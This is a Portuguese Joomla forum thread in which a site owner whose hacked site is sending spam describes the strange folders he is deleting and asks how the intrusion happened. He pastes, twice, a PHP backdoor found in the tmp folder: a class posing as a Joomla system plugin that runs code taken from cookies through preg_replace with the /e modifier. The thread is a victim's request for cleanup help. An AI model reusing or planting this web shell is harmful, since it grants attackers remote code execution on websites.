- Postagens: 35
- Obrigados Recebidos: 0
Administrar falhas - site hackeado
- vgomespt
-
Autor do Tópico
- Offline
- JCB! Colaborador
-
Menos
Mais
11 anos 5 meses atrás #96361
por vgomespt
Santos-SP
[color=#800000:1n14vil3][url:1n14vil3]http://vladmirgomes.assessoriaportuguesa.com.br[/url:1n14vil3][/color:1n14vil3]
vgomespt created the topic: Administrar falhas - site hackeado
Saudações!
O meu host entrou em contato e falou que o site está disparando emails a torto e a à diereita e fechou o site ! Me mandou um link/caminho que tinha uma pasta include dentro de components e vi que tinham outras pastas tipo language e outras com uns arquivos esquisitos.php ... deletei estas pastas e falei com o suporte, se houver mais disparos de emails, me contacte....
Joomla! 2.5.18 .....2.5.19
todas as extensões atualizadas
Pergunta.... se o joomla/extensões estão atualizadas e nada de plugins vulkneráveis, qual é o modo de invadir ? Descobrindo a senha do administrador ?
Como incluiram estas pastas no meu site ?
Agora estou tentando colocar senha para acesso diretorio do adm e tb mudando id do adm ...
uso joomla há trocentos anos e antes o xoops e agora tem esta chateação desses hackers/lammers ....não sei....
obrigado
t+
e esta pasta aqui ?
com_nonumberinstaller
Acabei de achar este aqui dentro da pasta tmp, dei um limpar na pasta, mas ele não saiu ...
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE;
if ($file){ $opt=$file(@$_COOKIE); $au=$file(@$_COOKIE); $opt("/292/e",$au,292); die();}}}
$index=new PlgSysJoomla;
.jindex.php
deletei este ....isso faz o que ?
putz...não paro de achar coisas.... isso é um câncer ....
agora vi que tem uma pasta upload com + 2 arquivos ....já deletei tudo
Tem em algum lugar falando que há as pastas tal, fora estas é só deletar, e dentro das pastas tais, se tiverem arquivos tipo isso ou aquilo tb delete ....
estou copiando para o meu HD e depois deletando no servidor, pra qualquer eventualidade, jogar d evolta caso eu faça uma besteira ....
Não há um scan free pra localizar possíveis arquivos intrusos nÃO ?
nOVAMENTE...AGRADEÇO!
O meu host entrou em contato e falou que o site está disparando emails a torto e a à diereita e fechou o site ! Me mandou um link/caminho que tinha uma pasta include dentro de components e vi que tinham outras pastas tipo language e outras com uns arquivos esquisitos.php ... deletei estas pastas e falei com o suporte, se houver mais disparos de emails, me contacte....
Joomla! 2.5.18 .....2.5.19
todas as extensões atualizadas
Pergunta.... se o joomla/extensões estão atualizadas e nada de plugins vulkneráveis, qual é o modo de invadir ? Descobrindo a senha do administrador ?
Como incluiram estas pastas no meu site ?
Agora estou tentando colocar senha para acesso diretorio do adm e tb mudando id do adm ...
uso joomla há trocentos anos e antes o xoops e agora tem esta chateação desses hackers/lammers ....não sei....
obrigado
t+
e esta pasta aqui ?
com_nonumberinstaller
Acabei de achar este aqui dentro da pasta tmp, dei um limpar na pasta, mas ele não saiu ...
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE;
if ($file){ $opt=$file(@$_COOKIE); $au=$file(@$_COOKIE); $opt("/292/e",$au,292); die();}}}
$index=new PlgSysJoomla;
.jindex.php
deletei este ....isso faz o que ?
putz...não paro de achar coisas.... isso é um câncer ....
agora vi que tem uma pasta upload com + 2 arquivos ....já deletei tudo
Tem em algum lugar falando que há as pastas tal, fora estas é só deletar, e dentro das pastas tais, se tiverem arquivos tipo isso ou aquilo tb delete ....
estou copiando para o meu HD e depois deletando no servidor, pra qualquer eventualidade, jogar d evolta caso eu faça uma besteira ....
Não há um scan free pra localizar possíveis arquivos intrusos nÃO ?
nOVAMENTE...AGRADEÇO!
Santos-SP
[color=#800000:1n14vil3][url:1n14vil3]http://vladmirgomes.assessoriaportuguesa.com.br[/url:1n14vil3][/color:1n14vil3]
Please Entrar ou Registrar to join the conversation.
- vgomespt
-
- Offline
- JCB! Colaborador
-
Menos
Mais
- Postagens: 35
- Obrigados Recebidos: 0
11 anos 5 meses atrás #96372
por vgomespt
Santos-SP
[color=#800000:1n14vil3][url:1n14vil3]http://vladmirgomes.assessoriaportuguesa.com.br[/url:1n14vil3][/color:1n14vil3]
vgomespt replied the topic: Re: Administrar falhas - site hackeado
Estou tentando tb jogar o configuration.php para outra pasta, como em trocentas matérias aqui na net e tb li vários que deram erros, mas o meu está dando tela branca no front...
boa páscoa !
boa páscoa !
Santos-SP
[color=#800000:1n14vil3][url:1n14vil3]http://vladmirgomes.assessoriaportuguesa.com.br[/url:1n14vil3][/color:1n14vil3]
Please Entrar ou Registrar to join the conversation.